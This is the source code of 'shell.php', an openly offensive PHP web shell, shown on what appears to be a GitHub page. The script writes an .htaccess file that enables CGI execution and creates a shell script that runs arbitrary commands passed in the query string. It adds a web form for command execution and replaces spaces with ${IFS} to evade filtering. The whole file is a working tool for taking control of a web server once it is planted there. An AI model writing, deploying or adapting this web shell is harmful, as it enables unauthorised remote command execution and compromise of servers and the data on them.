-
Notifications
You must be signed in to change notification settings - Fork 5
/
shell.php
119 lines (104 loc) · 2.98 KB
/
shell.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
<?php
// php-cgi-shell
// - jgor <[email protected]>
$dir = 'shell';
$shell = 'shell.hax';
function create_directory($folder) {
echo "Creating directory... ";
mkdir($folder, 0777) or die('failed<br />');
echo "done<br />";
}
function create_htaccess($file, $ext) {
echo "Creating htaccess... ";
$handle = fopen($file, 'w') or die('failed<br />');
$data = <<<EOT
Options +ExecCGI
AddHandler cgi-script .$ext
EOT;
fwrite($handle, $data);
fclose($handle);
echo "done<br />";
}
function create_shell($file) {
echo "Creating shell... ";
$handle = fopen($file, 'w') or die('failed<br />');
$data = <<<EOT
#!/bin/sh
echo "Content-type: text/plain"
echo ""
/bin/sh -c "\$QUERY_STRING 2>&1"
EOT;
fwrite($handle, $data);
fclose($handle);
echo "done<br />";
echo "Making shell executable... ";
chmod($file, 0755) or die('failed<br />');
echo "done<br />";
}
function remove_shell($shell) {
if (file_exists($shell)) {
echo "Deleting shell... ";
unlink($shell);
echo "done<br />";
}
}
function remove_htaccess($htaccess) {
if (file_exists($htaccess)) {
echo "Deleting htaccess... ";
unlink($htaccess);
echo "done<br />";
}
}
function remove_directory($dir) {
if (is_dir($dir)) {
echo "Deleting folder... ";
rmdir($dir);
echo "done<br />";
}
}
function display_shell($shell) {
if (file_exists($shell)) {
echo "<p>shell at [<a href=\"$shell\">$shell</a>]</p>";
echo "<form action=\"\" method=\"post\">";
echo "<input type=\"hidden\" name=\"remove\" value=\"1\" />";
echo "<input type=\"submit\" value=\"remove shell\" />";
echo "</form>";
echo "<form action=\"\" method=\"post\">";
echo "command: <input autofocus type=\"text\" name=\"cmd\" />";
echo "<input type=\"submit\" value=\"exec\" /></form>";
}
else {
echo "<p>no shell found.</p>";
echo "<form action=\"\" method=\"post\">";
echo "<input type=\"hidden\" name=\"create\" value=\"1\" />";
echo "<input type=\"submit\" value=\"create shell\" />";
echo "</form>";
}
}
function execute_command($shell, $cmd) {
$path = dirname($_SERVER['PHP_SELF']);
$shell_url = "http://$_SERVER[HTTP_HOST]$path/$shell";
$cmd = str_replace(' ', '${IFS}', $cmd);
$response = file_get_contents($shell_url . '?' . $cmd);
$output = htmlspecialchars($response);
echo "Output:<br /><textarea rows=25 cols=80>$output</textarea>";
}
$htaccess = "$dir/.htaccess";
$shell = "$dir/$shell";
$ext = pathinfo($shell, PATHINFO_EXTENSION);
if (isset($_REQUEST['remove'])) {
remove_shell($shell);
remove_htaccess($htaccess);
remove_directory($dir);
}
if (isset($_REQUEST['create'])) {
create_directory($dir);
create_htaccess($htaccess, $ext);
create_shell($shell);
}
display_shell($shell);
if (isset($_REQUEST['cmd'])) {
$cmd = $_REQUEST['cmd'];
execute_command($shell, $cmd);
}
?>